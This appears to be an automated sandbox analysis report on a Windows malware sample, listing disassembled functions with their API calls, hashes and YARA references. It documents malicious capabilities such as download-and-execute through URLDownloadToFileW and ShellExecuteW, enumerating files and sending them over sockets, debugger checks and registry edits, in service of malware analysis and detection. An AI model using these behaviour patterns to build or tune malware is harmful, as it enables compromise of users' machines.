                                                                                                                                                                                              • GetUserDefaultLCID.KERNEL32 ref: 004514D3
                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 0045152E
                                                                                                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 0045153D
                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451585
                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 004515A4
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 745075371-0
                                                                                                                                                                                              • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                                                                                              • Instruction ID: 411f265c59fe6ea8e7a4a7f389aa671ff947d679512e0c94986e3a05ae8bdf1c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4951B331900205ABDB20EFA5CC41BBF73B8AF05306F14456BFD11DB262D7789948CB69
                                                                                                                                                                                              Function 00407A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1157919129-0
                                                                                                                                                                                              • Opcode ID: 61484ff0a18bbbac8a51a5396f02c1862ca96db695df72985f64448775d16896
                                                                                                                                                                                              • Instruction ID: 8d2d5af9b240bd76912c5a42ed9d01478aca41623b4ca31e05b92188a1ecdcc3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 61484ff0a18bbbac8a51a5396f02c1862ca96db695df72985f64448775d16896
                                                                                                                                                                                              • Instruction Fuzzy Hash: EE5172329041089ACB14FBA5DD969ED7778AF50318F50017EB806B31D2EF3CAB498B99
                                                                                                                                                                                              Function 00406128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                                                                                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: DownloadExecuteFileShell
                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\4XYAW8PbZH.exe$open
                                                                                                                                                                                              • API String ID: 2825088817-1577825473
                                                                                                                                                                                              • Opcode ID: ff8c430fb8ca32cad0500a1d36d7f1307f3dbf8e19fa7769455aa58a39e32366
                                                                                                                                                                                              • Instruction ID: ed092bbb38966d98691ab8c1252c2e533cce500cde7a5ae80e96292b959be8c1
                                                                                                                                                                                              • Opcode Fuzzy Hash: ff8c430fb8ca32cad0500a1d36d7f1307f3dbf8e19fa7769455aa58a39e32366
                                                                                                                                                                                              • Instruction Fuzzy Hash: AC61A231604340A7CA14FA76C8569BE77A69F81718F00493FBC46772E6EF3C9A05C69B
                                                                                                                                                                                              Function 00406AC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileFind$FirstNextsend
                                                                                                                                                                                              • String ID: x@G$x@G
                                                                                                                                                                                              • API String ID: 4113138495-3390264752
                                                                                                                                                                                              • Opcode ID: 0289bfe1971c588a6e1e7db017a286e895e6150be38c6e727895ab5dcaa3e2db
                                                                                                                                                                                              • Instruction ID: 69ed09b71aae528489a15fdfe73527b1f784865601dfee234b785914c9021214
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0289bfe1971c588a6e1e7db017a286e895e6150be38c6e727895ab5dcaa3e2db
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D2147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                                                                                                                              Function 0041BB87 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                                                                                                                                                                • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                                                                                                                                                                • Part of subcall function 004126D2: RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                                                                                                                                                                • Part of subcall function 004126D2: RegCloseKey.ADVAPI32(004655B0,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                                                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                                                              • API String ID: 4127273184-3576401099
                                                                                                                                                                                              • Opcode ID: 2bffa28fade511f5357cc31b36866154740c52a347c2bc5d983fcb8ea3edd996
                                                                                                                                                                                              • Instruction ID: f939710b15fdea32ddc266fac7b70a3034aa980cea7cdc9a443a85228e3c1b8e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2bffa28fade511f5357cc31b36866154740c52a347c2bc5d983fcb8ea3edd996
                                                                                                                                                                                              • Instruction Fuzzy Hash: 69113332B8060433D514343A4E6FBAE1806D756B60FA4015FF6026A7DAFB9E4AE103DF
                                                                                                                                                                                              Function 0041BB81 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                                                                                                                                                                • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                                                                                                                                                                • Part of subcall function 004126D2: RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                                                                                                                                                                • Part of subcall function 004126D2: RegCloseKey.ADVAPI32(004655B0,?,?,0041BC56,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseCreateInfoParametersSystemValue
                                                                                                                                                                                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                                                                                                              • API String ID: 4127273184-3576401099
                                                                                                                                                                                              • Opcode ID: 7c51b3188c376ba38d52579200b820b5fb98d0af855b283685fe47f8f21eb3fa
                                                                                                                                                                                              • Instruction ID: 2aa0b6b87930d0e8bc36fe4f809622c3d335fadd5e5dd78f891cc162e383a86f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c51b3188c376ba38d52579200b820b5fb98d0af855b283685fe47f8f21eb3fa
                                                                                                                                                                                              • Instruction Fuzzy Hash: E1F06232B8021422D529357A4E2FBEE1801D796B20F54002FF202A97E6FB8E4AD142DE
                                                                                                                                                                                              Function 00450A8F Relevance: 6.2, APIs: 4, Instructions: 236COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 00450B71
                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 00450C01
                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 00450C0F
                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00450CB2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4212172061-0
                                                                                                                                                                                              • Opcode ID: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                                                                                                                              • Instruction ID: 5c43a781d12153ba09aec0d98fe41cbdfc67d130b552f984b55d9713d4fa54bc
                                                                                                                                                                                              • Opcode Fuzzy Hash: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C613C39600306AAD729AB35CC42AAB7398EF05316F14052FFD05D7283E778ED49C769
                                                                                                                                                                                              Function 00408DA7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileFind$FirstH_prologNext
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 301083792-0
                                                                                                                                                                                              • Opcode ID: de076679f85755db87780a347033046bf4357413a6f37d78cf41cd7617215d73
                                                                                                                                                                                              • Instruction ID: f05055f275ce1a6697326a6dce2c5e98ec7bccfbf1b509f624b4afbba7a31620
                                                                                                                                                                                              • Opcode Fuzzy Hash: de076679f85755db87780a347033046bf4357413a6f37d78cf41cd7617215d73
                                                                                                                                                                                              • Instruction Fuzzy Hash: 08714F728001199BCB15EBA1DC919EE7778AF54318F10427FE846B71E2EF386E45CB98
                                                                                                                                                                                              Function 00448067 Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _free.LIBCMT ref: 00448077
                                                                                                                                                                                                • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32 ref: 00448089
                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,?,0047179C,000000FF,?,0000003F,?,?), ref: 00448101
                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,?,004717F0,000000FF,?,0000003F,?,?,?,0047179C,000000FF,?,0000003F,?,?), ref: 0044812E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 806657224-0
                                                                                                                                                                                              • Opcode ID: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                                                                                                                                              • Instruction ID: 7f7bbd1fe339d2c51afc51fb5ca91abc0e6e8a710e1dc4bf18eddf40c0258009
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                                                                                                                                              • Instruction Fuzzy Hash: B231BA70904205DFEB159F69CC8287EBBB8FF0576072541AFE054AB2B1DB348D46DB58
                                                                                                                                                                                              Function 00450E7A Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450ECE
                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F1F
                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FDF
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2829624132-0
                                                                                                                                                                                              • Opcode ID: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
                                                                                                                                                                                              • Instruction ID: f4db154689a757c669ee29d9ad80dc5f2d25de97e2fa36f56d0a3b4566e2e889
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5261B3359002079BEB289F24CC82B7A77A8EF04706F1041BBED05C6696E77CD989DB58
                                                                                                                                                                                              Function 0043A66D Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0043A765
                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0043A76F
                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0043A77C
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                              • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                                                                                              • Instruction ID: 91e5dab5071ea2c3d468f992cf6309450941867bc48944ec1b7f80ed58ec6f75
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A31D27494132CABCB21DF24D98979DBBB8AF08310F5051EAE80CA7261E7349F81CF49
                                                                                                                                                                                              Function 0043294A Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326D2,00000024,?,?,?), ref: 0043295C
                                                                                                                                                                                              • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBCE,?), ref: 00432972
                                                                                                                                                                                              • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBCE,?), ref: 00432984
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1815803762-0
                                                                                                                                                                                              • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                                                                                              • Instruction ID: 265e42ecfadf18463eab4f7c57cd3d944434f2f899047e0b797dffc1cacfdca9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                                                                                              • Instruction Fuzzy Hash: 06E06531318311BBEB310E21BC08F577AE4AF89B72F650A3AF251E40E4D2A288019A1C
                                                                                                                                                                                              Function 00442564 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,0044253A,?), ref: 00442585
                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,0044253A,?), ref: 0044258C
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0044259E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                              • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                                                                                              • Instruction ID: c44577b837509f0b32c3b0b508549cfe19acceb0599f6adc3fd698849a85d96e
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                                                                                                              • Instruction Fuzzy Hash: 68E08C31004208BFEF016F10EE19A8D3F29EF14382F448475F8098A232CB79DD82CB88
                                                                                                                                                                                              Function 004475A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475FA
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                              • String ID: GetLocaleInfoEx
                                                                                                                                                                                              • API String ID: 2299586839-2904428671
                                                                                                                                                                                              • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                                                                                              • Instruction ID: 2e67eb2aa2785e7236de0a8104ca96919387e7076f6eaa21777fcb5c897bf932
                                                                                                                                                                                              • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                                                                                                              • Instruction Fuzzy Hash: F8F0F031A44308BBDB11AF61DC06F6E7B25EF04722F10016AFC042A292CF399E11969E
                                                                                                                                                                                              Function 004510CA Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045111E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1663032902-0
                                                                                                                                                                                              • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                                                                                              • Instruction ID: ffb89f5268d48ef7d96d62573a9e7ee2f0935f0833e1875b56c64ac51f5bdf94
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                                                                                                              • Instruction Fuzzy Hash: BB21B332500606ABEB249E25DC42B7B73A8EF49316F1041BBFE01D6252EB7C9D49C759
                                                                                                                                                                                              Function 00450D52 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00450E7A,00000001), ref: 00450DC4
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000003.00000002.1676305000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_4XYAW8PbZH.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1084509184-0
                                                                                                                                                                                              • Opcode ID: 7b25a473866e755be9e0678553a2658a3eea11fb5f40ef7cfa4196b50ecc0277
                                                                                                                                                                                              • Instruction ID: a560303710cbb7e2025c6fde9de160b8e713eede11b464f6c41b4ad7cf2026db
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b25a473866e755be9e0678553a2658a3eea11fb5f40ef7cfa4196b50ecc0277
